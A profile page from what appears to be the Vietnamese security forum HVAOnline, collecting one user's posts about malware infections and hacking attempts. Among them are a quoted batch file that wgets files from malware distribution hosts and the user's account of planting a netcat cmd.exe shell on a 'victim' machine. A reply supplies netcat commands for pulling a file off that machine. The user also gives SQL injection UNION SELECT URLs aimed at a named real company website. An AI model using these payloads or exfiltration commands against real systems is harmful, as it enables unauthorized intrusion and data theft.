banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: whitesnow19  XML
Profile for whitesnow19 Messages posted by whitesnow19 [ number of posts not being displayed on this page: 0 ]
 

TQN wrote:
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái.
Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"
pause


 

Em làm theo anh mà thằng avira của em nó nhai mất k113.css rồi. Hic


ga_cum06 wrote:
ông này hay thật nhỉ tôi post web này trước smilie) tự nhiên mở hẳn topic riêng giới thiệu mỗi trang web là sao, phí tài nguyên quá 

Anh mod ơi. Del bài em cái. Thằng em không biết nên có gì anh dịch cúm gà bỏ qua nhé?
Tuy rằng một số tool trên thư viện này đã old version nhưng mình tin chắc khả năng nó mang lại không phải là nhỏ nếu bạn biết cách khai thác nó.

http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools

Đã kiểm tra link. Có gì mọi người cứ reply lại nhé. Bên trái có cây thư mục, bấm vào dấu + là nó xổ xuống một loạt

Cảm ơn bạn versac nhé!
Các anh xem thử domain sau có gì không nhé. Thằng AvastSvc.exe của em máy ngày nay toàn kết nối với nó thôi. Mỗi lần có gần chục kết nối.

causig1.cau.edu

Chương trình antiVirus mà kết nối tới .edu????
Cảm ơn các anh (chị) đã reply topic của em. Em cứ tưởng post bài lên đây thì sẽ có ai đó chịu tìm hiểu kỹ vấn đề với em.Nào ngờ...Nếu chỉ là vấn đề không truy cập được bình thường thì em chẳng nói làm gì. Đằng này máy em trong thời gian buổi ngày thì truy cập toàn bị chặn (như trên), đến tối khoảng 22h trở đi là truy cập bình thường. Nếu bị chặn bởi virus thì tại sao nó phải phân giờ ra như vậy??? Tại sao nó chặn google mà không chặn các trang anti????
Mà thôi, Nhờ anh mod del hoặc close topic này giúp em với, em ghost lại máy rồi nên chẳng còn gì mà nói nữa cả. Buồn!
Bây giờ là 12h30 ngày 11/8/2011: Tình trạng máy em lại tái phát, không thể truy cập vào các dịch vụ của Google, không thể download, nghe nhạc, xem phim gì được. Chỉ có thể lướt web nhưng cũng có một số trang không vào được và lỗi cũng như trên.
Anh mv1098 ơi! Máy em không cài McAfee. Bên box thảo luận virus em có viết một bào report về vấn đề này. Anh ghé qua xem giúp em với nhé.Em vừa mới sửa tiêu đề vì có anh nhắc là tiêu đề trước của em sẽ chẳng ai thèm đọc cả.

/hvaonline/posts/list/0/39762.html#244871

diverpckd wrote:
bạn post hinh lên thì mọi nguoi mới góp ý được chứ
 
màn hình tắt thì post làm sao được.
Các anh đâu hết rồi? Em biết là các anh rất bận nhưng chỉ xin các anh ít phút thôi mà.
Tình hình là máy em không cài bất kỳ chương trình McAfee nào cả. DNS ở đây em muốn nói là DNS chỉnh trong phần config ip để vào facebook ấy. 8.8.8.8

FW là gì vậy bác angel_of_evil
Đây là file Log của HijackThis vừa quét tức thì sau khi post bài trên:
http://www.mediafire.com/?1l6467kgafwo8hl
Em xin lỗi đã viết tiêu đề như thế, chỉ để mong các anh chú ý tới bài của em một tí.
Tình hình là em có viết 1 topic bên box "Thảo luận khác" nhưng hôm nay em vừa phát hiện ra một điều kỳ lạ. Hầu như cả ngày em truy cập mạng đề gặp vấn đề như đã trình bày bên topic kia. Nhưng tại thời điểm này lúc 22h17 em lại có thể truy cập vào các dịch vụ của Google mà không bị chặn. Chính vì điều đó mà em đã tiền hành xem lại quá trình sử dụng máy tính và điều lạ em đã phát hiện được là phần McAfee đó xuất hiện trong một phần mềm mà em đã từng cài.

http://www.facemoods.com/

Phần mềm này hỗ trợ sử dụng Facebook. Em nghĩ có điều mờ ám nên download file Facemoods.exe trên trang đó về và ném vào VirusTotal.Com để quét và kết quả là NOD32 phát hiện: probably a variant of Win32/InstallCore.A

http://www.virustotal.com/file-scan/report.html?id=a12b1a49a5b2b7eee9685ef5db38318806c4019583bc34e62d7f31b439c9fe4c-1312988811

Em đã dùng TPCView để ghi lại log kết nối của máy em tại lúc này thấy có một số kết nối lạ (lạ đối với em). Các anh xem qua nhé:

http://www.mediafire.com/?8k8wwkae3xvnpti

Không biết đây có phải là STL nên em cứ up lên cho các anh xem vì ngày nay nhu cầu Facebook cũng nóng không kém gì Unikey.

Em chân thành cảm ơn!
Máy em dạo này luôn hiện như thế này
=====================
403 - Forbidden
McAfee®
Access denied by URL filter Information:

Access denied to destination http://www.google.com/
By rule www.google.com


See your system administrator for further information.


Copyright © 1993-2009 McAfee, Inc.
All Rights Reserved.
http://www.mcafee.com
====================
tình hình là không thể xem được mấy cái mail. Hic! Các anh giúp em với. Em thử dùng cả 3G cũng không vào được. Không cài chương trình hide ip, không xài dns....

Vanxuanemp wrote:

whitesnow19 wrote:

Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử. 


Chưa bao giờ có bản Unikey Vista cả, bạn hãy vào trực tiếp trang Unikey.org down lại nhé. Bản Unikey Vista là bản mod lại từ code của Unikey 3.6 (hoặc nếu không nhầm thì còn cũ hơn). Đừng là người tiếp tay cho STL khi không bao giờ down soft từ chính homepage! 



Xin lỗi bạn nhé! Có vẻ như bạn chưa đọc kỹ bài viết của mình. Trong bài viết ghi rõ là mình tải bản Unikey4RC tại trang chủ. Trong phần comment trên mình chỉ giải thích cho bạn trên hiểu là bản đó mình đã tải lâu rồi. Chỉ vì muốn nhờ các anh giúp phân tích xem thử có phải virus STL nên mình mới post lên đây. Có gì không phải bạn bỏ qua nhé

tanviet12 wrote:
Bản tải link nào chứ mình download trên Unikey.org và scan bằng virustotal đâu phát hiện "mèo què" hay '"tròi gián" nào đâu.

Kết quả: http://www.virustotal.com/file-scan/report.html?id=aba5c0bff0442597ff8743b4fe7d28de945b78be01eb88fc4a95cadd1fbee409-1312691552

 


Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử.
Không biết có phải em lo xa không mà hôm nay vừa đọc xong bài viết của các anh, em liền test thằng Unikey Vista em đang dùng. Kết quả scan trên virusTotal ra là 1/40 nhưng không biết có phải có em bé không. Các anh xem qua giúp em:
UnikeyVistasmilie1/40)
http://www.virustotal.com/file-scan/report.html?id=e77ce23ccf401273cb01233d0f63600a4efcfce9576f66c2b20dfa85ec9d95b7-1312684524
unikey40RC2-1101-win32.zip (Bản này download ở trang chủ Unikey.org): (3/40) có trojan)
http://www.virustotal.com/file-scan/report.html?id=eaff3879e980449f844bddd84a85375f013d11527af6b1dbc7c9e858dd7034e6-1312685430

Kiểu này thì em biết xài bộ gõ nào đây?
Bữa sau bạn đặt cái tiêu đề chuẩn tí nhé. Tiêu đề một đường bài viết một nẻo. Mình không phải dân an ninh mạng nhưng có thể bày cho bạn một cách chuẩn đoán bệnh tiệm nét bạn đang gặp là bạn sử dụng một máy. Cài mới lại tất cả. Tức là không ghost. Sau khi cài xong Win thì tiến hành cài antivirus download từ internet chứ không chép từ nguồn khác. Tiến hành cài game cũng = cách download mới về cài. Nếu tình trạng vẫn bị thì chắc chắn đường truyền bạn bị lỗi. Dây cáp Lan để lâu ngày cũng có hiện tượng mạng chập chờn lắm.

conmale wrote:
Thử:

trên server (máy của nạn nhân):
type khongxem.rar | nc -l 9876

trên client (máy của bồ):
nc <server ip> 9876 > khongxem.rar

thử được không?

Sao không chịu đọc kỹ và suy nghĩ một tí rồi làm thử, táy máy thử? Ngay cả cách sử dụng netcat cũng không chịu khó đọc và hiểu thì làm cái gì?

Muốn làm 'héc cờ' mà không chịu khó, kiên nhẫn, tìm tòi, thử nghiệm thì nên từ bỏ ý định ngay từ đầu vì phí thời gian vô ích mà chẳng đi tới đâu hết. 


Thưa anh, lệnh trên máy victim không hoạt động được. Ở đây em đang nói là mạng Lan nên điều tất nhiên cả victim lẫn serve đều là Window.

Em thử lệnh victim của anh thì nó lại ra như thế này

C:\>type log.txt | netcat -l 9876
local listen fuxored: INVAL

C:\>

Stanley_00 wrote:


Em lại nghĩ bên server thì chỉ cần biết cái size của file thôi, rồi wwwect thôi, cái này win làm được mà smilie
Client thì chạy lệnh giống như trên. 



Nói rõ đi bạn! Nói chung chung thế khó hiểu quá.Mình là newbie mà
Thank anh Conmale nhé. Dù sao có comment của anh em cũng biết được hướng giải quyết: Tìm cách khác. ^^


Anh WinDak có thế nói rõ thêm cách transfer không? Vì đây em đang bàn luận trên mạng Lan nên không biết làm như thế nào trong môi trường Dos.
Tại sao không ai trả lời giúp mình vậy nè. Admin smod ơi, ai quản lý chuyên mục này vô cho ý kiến với. Nếu đã có bài tương tự thì cho mình biết để mình học tập với.

Trên mạng có cách gửi file bằng netcat với câu lệnh netcat [ip][port] >/< [filename]

Nhưng mình thực hiện thì không được.
Tình hình là em đang tập tành ngâm cứu xâm nhập bằng netcat. Em đã cái thành công netcat lên máy victim. Đã có thể shutdown máy victim ngon lành. Nhưng tình hình là em thấy máy victim có file khongxem.rar. Tò mò muốn download file này về. Xin hỏi các anh các chị trong diễn đàn mình làm thế náo để gửi file bằng netcat (Vì hiện tại con đường duy nhất em chui vào máy tính victim là đường netcat đã đổ cmd.exe

Nếu đã có bài viết trên diễn đàn với vấn đề tương tự, xin anh chị comment cho em cái link vì em tìm mỏi mắt mà chẳng thấy.

Rất mong nhận được sự hồi đáp của các anh chị!

Newbie!

PS:Trên cả mạng Lan và Internet
http://www.etek.com.vn/page.php?type=app&id=null%20union%20select%201,2,3,4,5,6,7,8--

Với link trên thì sẽ cho ra vài con số.
Em đã thử dò version() = 5
Tiếp theo em thử dò table mà không hiển thị gì hết.

http://www.etek.com.vn/page.php?type=app&id=null%20union%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables--

==> trống trơn phần nội dung, không phải trống trơn cả trang web.

Xin các a vào chỉ giáo giúp.


Hack to Learn - Not to Destroy!
 
Go to Page:  First Page Page 1

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|